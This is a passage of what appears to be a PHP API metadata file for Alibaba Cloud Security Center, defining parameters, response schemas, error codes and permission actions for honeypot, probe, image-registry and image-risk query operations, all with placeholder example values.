'yundun-sas:ListHoneypotNode', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneypotNode', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypotnode/{#NodeId}'], ], ], ], ], ], 'ListHoneypotPreset' => [ 'summary' => 'Queries honeypot templates.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'HoneypotImageName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the honeypot image.'."\n", 'type' => 'string', 'required' => false, 'example' => 'ruoyi'], ], [ 'name' => 'PresetName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The custom name of the honeypot template.'."\n", 'type' => 'string', 'required' => false, 'example' => 'mx-rouyi'], ], [ 'name' => 'NodeName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the management node.'."\n", 'type' => 'string', 'required' => false, 'example' => 'Node1'], ], [ 'name' => 'NodeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the management node.'."\n", 'type' => 'string', 'required' => false, 'example' => 'd892b4fe-af0d-4486-ab2a-8a518045****'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: 20. If you leave this parameter empty, 20 entries are returned on each page.'."\n" ."\n" .'> We recommend that you do not leave this parameter empty.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => 'PageResult', 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'An array that consists of the honeypot templates.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the honeypot template.'."\n", 'type' => 'object', 'properties' => [ 'HoneypotImageName' => ['description' => 'The name of the honeypot image.'."\n", 'type' => 'string', 'example' => 'metabase', 'title' => ''], 'PresetName' => ['title' => '', 'description' => 'The custom name of the honeypot template.'."\n", 'type' => 'string', 'example' => 'WebMin-online'], 'HoneypotPresetId' => ['title' => '', 'description' => 'The ID of the honeypot template.'."\n", 'type' => 'string', 'example' => '3cc04a47-7229-418c-8101-f10a2887****'], 'NodeId' => ['title' => '', 'description' => 'The ID of the management node.'."\n", 'type' => 'string', 'example' => 'c94eff5b-ea48-4805-8b7f-e04d3509****'], 'ControlNodeName' => ['title' => '', 'description' => 'The name of the management node.'."\n", 'type' => 'string', 'example' => 'node1'], 'HoneypotImageDisplayName' => ['title' => '', 'description' => 'The display name of the honeypot image.'."\n", 'type' => 'string', 'example' => 'Metabase'], 'PresetType' => ['title' => '', 'description' => 'The type of the honeypot template. Valid values:'."\n" ."\n" .'* **TEMP**: automatically generated template'."\n" .'* **CUSTOM**: custom template'."\n" .'* **DEFAULT**: default template'."\n", 'type' => 'string', 'example' => 'CUSTOM'], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page. Default value: 20.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '55', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '0C656B33-0D6B-5953-A26A-D766BD75B44A', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"List\\": [\\n {\\n \\"HoneypotImageName\\": \\"metabase\\",\\n \\"PresetName\\": \\"WebMin-online\\",\\n \\"HoneypotPresetId\\": \\"3cc04a47-7229-418c-8101-f10a2887****\\",\\n \\"NodeId\\": \\"c94eff5b-ea48-4805-8b7f-e04d3509****\\",\\n \\"ControlNodeName\\": \\"node1\\",\\n \\"HoneypotImageDisplayName\\": \\"Metabase\\",\\n \\"PresetType\\": \\"CUSTOM\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 55,\\n \\"Count\\": 20\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"0C656B33-0D6B-5953-A26A-D766BD75B44A\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'ListHoneypotPreset', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListHoneypotPreset', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneypotPreset', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypotpreset/*'], ], ], ], ], ], 'ListHoneypotProbe' => [ 'summary' => 'Queries the list of honeypot probes.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'ProbeStatus', 'in' => 'query', 'schema' => ['description' => 'The probe status. Valid values:'."\n" .'- **installed**: Installation succeeded.'."\n" .'- **install_failed**: Installation failed.'."\n" .'- **online**: Normal.'."\n" .'- **offline**: Offline.'."\n" .'- **unnormal**: Service exception.'."\n" .'- **unprobe**: Unauthorized.'."\n" .'- **uninstalling**: Uninstalling.'."\n" .'- **uninstalled**: Uninstallation succeeded.'."\n" .'- **uninstall_failed**: Uninstallation failed.'."\n" .'- **not_exist**: Not installed.', 'type' => 'string', 'required' => false, 'example' => 'online', 'title' => ''], ], [ 'name' => 'DisplayName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the probe.', 'type' => 'string', 'required' => false, 'example' => 'probe-test'], ], [ 'name' => 'ProbeType', 'in' => 'query', 'schema' => ['description' => 'The probe type. Valid values:'."\n" ."\n" .'- **host_probe**: host probe'."\n" .'- **vpc\\_black\\_hole_probe**: VPC blackhole probe.', 'type' => 'string', 'required' => false, 'example' => 'host_probe', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Minimum value: **1**. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return on each page in a paged query. Default value: 20. If you leave this parameter empty, 20 entries are returned per page during paging.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'The list of honeypot probe data.', 'type' => 'array', 'items' => [ 'description' => 'The honeypot probe data.', 'type' => 'object', 'properties' => [ 'ProbeId' => ['title' => '', 'description' => 'The probe ID.', 'type' => 'string', 'example' => '4d167bb3-dd09-4a6a-a179-d5d6a5b0****'], 'ProbeType' => ['title' => '', 'description' => 'The probe type. Valid values:'."\n" ."\n" .'- **host_probe**: host probe'."\n" .'- **vpc\\_black\\_hole_probe**: VPC blackhole probe.', 'type' => 'string', 'example' => 'host_probe'], 'ProbeVersion' => ['title' => '', 'description' => 'The probe version.', 'type' => 'string', 'example' => '18060096'], 'DisplayName' => ['title' => '', 'description' => 'The probe name.', 'type' => 'string', 'example' => 'prod-pinpoint-hd1b '], 'OsType' => ['title' => '', 'description' => 'The operating system type of the probe instance. Valid values:'."\n" ."\n" .'- windows: Windows.'."\n" .'- linux: Linux.', 'type' => 'string', 'example' => 'windows'], 'HostIp' => ['title' => '', 'description' => 'The local IP address bound to the probe.', 'type' => 'string', 'example' => '33.53.XX.XX'], 'ControlNode' => [ 'title' => '', 'description' => 'The management node data.', 'type' => 'object', 'properties' => [ 'NodeId' => ['title' => '', 'description' => 'The node ID.', 'type' => 'string', 'example' => '8ec9da17-c0e7-4642-aad6-defc9722****'], 'NodeName' => ['title' => '', 'description' => 'The node name.', 'type' => 'string', 'example' => 'HoneypotNode1'], 'EcsInstanceId' => ['title' => '', 'description' => 'The ECS instance ID.', 'type' => 'string', 'example' => 'i-uf6eq0rlvu1mkh0p****'], ], 'example' => '', ], 'DeployTime' => ['title' => '', 'description' => 'The deployment time.', 'type' => 'integer', 'format' => 'int64', 'example' => '1669363825000'], 'Status' => ['description' => 'The probe status. Valid values:'."\n" .'- **installed**: Installation succeeded.'."\n" .'- **install_failed**: Installation failed.'."\n" .'- **online**: Normal.'."\n" .'- **offline**: Offline.'."\n" .'- **unnormal**: Service exception.'."\n" .'- **unprobe**: Unauthorized.'."\n" .'- **uninstalling**: Uninstalling.'."\n" .'- **uninstalled**: Uninstallation succeeded.'."\n" .'- **uninstall_failed**: Uninstallation failed.'."\n" .'- **not_exist**: Not installed.', 'type' => 'string', 'example' => 'online', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the asset instance where the host probe is deployed.', 'type' => 'string', 'example' => '49e25e0f-bb51-4a5a-a1b3-13a4ddaa****', 'title' => ''], 'VpcId' => ['description' => 'The ID of the VPC-connected instance where the VPC probe is deployed.', 'type' => 'string', 'example' => 'vpc-5gu8iu68w9b472jbb****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The current page number returned in the paged query during paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of honeypot probes displayed per page in the paged query during paging. Default value: **20**.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of honeypot probes returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'Count' => ['description' => 'The number of honeypot probes displayed on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of a failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The response message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '4BC9E610-21BE-537F-82EF-144A60D5A970', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code of the response.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query honeypot probes', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListHoneypotProbe', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneypotProbe', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypotprobe/*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"List\\": [\\n {\\n \\"ProbeId\\": \\"4d167bb3-dd09-4a6a-a179-d5d6a5b0****\\",\\n \\"ProbeType\\": \\"host_probe\\",\\n \\"ProbeVersion\\": \\"18060096\\",\\n \\"DisplayName\\": \\"prod-pinpoint-hd1b \\",\\n \\"OsType\\": \\"windows\\",\\n \\"HostIp\\": \\"33.53.XX.XX\\",\\n \\"ControlNode\\": {\\n \\"NodeId\\": \\"8ec9da17-c0e7-4642-aad6-defc9722****\\",\\n \\"NodeName\\": \\"HoneypotNode1\\",\\n \\"EcsInstanceId\\": \\"i-uf6eq0rlvu1mkh0p****\\"\\n },\\n \\"DeployTime\\": 1669363825000,\\n \\"Status\\": \\"online\\",\\n \\"Uuid\\": \\"49e25e0f-bb51-4a5a-a1b3-13a4ddaa****\\",\\n \\"VpcId\\": \\"vpc-5gu8iu68w9b472jbb****\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 30,\\n \\"Count\\": 20\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"4BC9E610-21BE-537F-82EF-144A60D5A970\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'ListHoneypotProbeUuid' => [ 'summary' => 'Queries probe IDs by probe type and node ID.', 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list'], 'parameters' => [ [ 'name' => 'ControlNodeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the management node.'."\n" .'> You can call the [ListHoneypotNode](~~ListHoneypotNode~~) operation to obtain this value.', 'type' => 'string', 'required' => false, 'example' => 'a882e590-b87b-45a6-87b9-d0a3e5a0****'], ], [ 'name' => 'ProbeType', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The probe type. Valid values:'."\n" ."\n" .'- **host_probe**: host probe'."\n" ."\n" .'- **vpc\\_black\\_hole_probe**: VPC blackhole probe.', 'type' => 'string', 'required' => false, 'example' => 'host_probe'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The queried list data.', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The list of resources associated with the probe.', 'type' => 'array', 'items' => ['description' => 'The resource ID associated with the probe.', 'type' => 'string', 'example' => '28c2de29-302f-49e9-99ee-90d5ca63321a', 'title' => ''], 'title' => '', 'example' => '', ], 'Count' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The response message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '32C9C2A6-B837-538E-921B-90746CB*****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query probe iDs by probe type and node ID', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListHoneypotProbeUuid', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": [\\n \\"28c2de29-302f-49e9-99ee-90d5ca63321a\\"\\n ],\\n \\"Count\\": 10,\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"32C9C2A6-B837-538E-921B-90746CB*****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'ListImageBuildRiskItem' => [ 'summary' => 'Queries the types of risky image build commands.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list'], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: zh. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'ListResult'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The response parameters.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'ItemKey' => ['description' => 'The type key of the risky build command.'."\n", 'type' => 'string', 'example' => 'key', 'title' => ''], 'ItemName' => ['description' => 'The type name of the risky build command.'."\n", 'type' => 'string', 'example' => 'itemName', 'title' => ''], ], 'description' => 'The data returned.'."\n", 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'A3D7C47D-3F11-57BB-90E8-E5C20C619F37', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": [\\n {\\n \\"ItemKey\\": \\"key\\",\\n \\"ItemName\\": \\"itemName\\"\\n }\\n ],\\n \\"RequestId\\": \\"A3D7C47D-3F11-57BB-90E8-E5C20C619F37\\"\\n}","type":"json"}]', 'title' => 'ListImageBuildRiskItem', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListImageBuildRiskItem'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListImageBuildRiskItem', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListImageRegistryExtra' => [ 'summary' => 'Queries the extra configuration information of an image repository.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'list', 'abilityTreeCode' => '92332', 'abilityTreeNodes' => ['FEATUREsasA217JR'], 'autoTest' => false, ], 'parameters' => [ [ 'name' => 'RegistryId', 'in' => 'query', 'schema' => ['description' => 'The image repository ID.'."\n" .'>Call the [PageImageRegistry](~~PageImageRegistry~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '25363', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '09969D2C-4FAD-429E-BFBF-9A60DEF8****', 'title' => ''], 'ImageRegistryExtraInfos' => [ 'description' => 'The extra configuration information of the image repository.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'RegistryId' => ['description' => 'The image repository ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '25363', 'title' => ''], 'AuthToken' => ['description' => 'The authorization token.', 'type' => 'string', 'example' => '64ad8ddf-6a4c-46b5-8dea-b105a06bd534', 'title' => ''], 'AliUid' => ['description' => 'The Alibaba Cloud account ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '176618589410****', 'title' => ''], 'RegistryType' => ['description' => 'The image repository type. Valid values:'."\n" ."\n" .'- **acr**: ACR'."\n" .'- **harbor**: Harbor'."\n" .'- **quay**: Quay'."\n" .'- **CI/CD**: Jenkins.', 'type' => 'string', 'example' => 'harbor', 'title' => ''], 'Namespace' => ['description' => 'The namespace of the image.', 'type' => 'string', 'example' => 'public-goods', 'title' => ''], 'Id' => ['description' => 'The configuration ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '113441', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query extra configuration information of an image repository', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListImageRegistryExtra'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListImageRegistryExtra', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"09969D2C-4FAD-429E-BFBF-9A60DEF8****\\",\\n \\"ImageRegistryExtraInfos\\": [\\n {\\n \\"RegistryId\\": 25363,\\n \\"AuthToken\\": \\"64ad8ddf-6a4c-46b5-8dea-b105a06bd534\\",\\n \\"AliUid\\": 0,\\n \\"RegistryType\\": \\"harbor\\",\\n \\"Namespace\\": \\"public-goods\\",\\n \\"Id\\": 113441\\n }\\n ]\\n}","type":"json"}]', ], 'ListImageRegistryRegion' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requesting and receiving messages. Default value: zh. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for this request. It can be used for troubleshooting and diagnostics.', 'type' => 'string', 'example' => '291B49F9-1685-4005-9D34-606B6F78****', 'title' => ''], 'Regions' => [ 'description' => 'The list of regions.', 'type' => 'array', 'items' => [ 'description' => 'The region information.', 'type' => 'object', 'properties' => [ 'RegionName' => ['description' => 'The region name.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'RegionId' => ['description' => 'The ID of the region where the image resides.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query regions that support private image registry access', 'summary' => 'Queries the regions that support private image registry access.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListImageRegistryRegion'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListImageRegistryRegion', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"291B49F9-1685-4005-9D34-606B6F78****\\",\\n \\"Regions\\": [\\n {\\n \\"RegionName\\": \\"cn-hangzhou\\",\\n \\"RegionId\\": \\"cn-hangzhou\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListImageRisk' => [ 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list'], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paging query. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster to query.'."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'c80f79959fd724a888e1187779b13****', 'title' => ''], ], [ 'name' => 'Namespace', 'in' => 'query', 'schema' => ['description' => 'The image namespace.', 'type' => 'string', 'required' => false, 'example' => 'kube-sy****', 'title' => ''], ], [ 'name' => 'AppName', 'in' => 'query', 'schema' => ['description' => 'The application name.', 'type' => 'string', 'required' => false, 'example' => 'e****', 'title' => ''], ], [ 'name' => 'ImageName', 'in' => 'query', 'schema' => ['description' => 'The image name.', 'type' => 'string', 'required' => false, 'example' => 'container-***:****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '050ACC7A-D4FD-55C6-B861-BA9569C1****'], 'ImageRiskList' => [ 'description' => 'The list of image risk information.', 'type' => 'array', 'items' => [ 'description' => 'The image risk information.', 'type' => 'object', 'properties' => [ 'RepoNamespace' => ['description' => 'The image namespace.', 'type' => 'string', 'example' => 'vultar***', 'title' => ''], 'RepoName' => ['description' => 'The name of the image repository.', 'type' => 'string', 'example' => 'scan_test', 'title' => ''], 'Tag' => ['description' => 'The image tag.', 'type' => 'string', 'example' => '0.1.0', 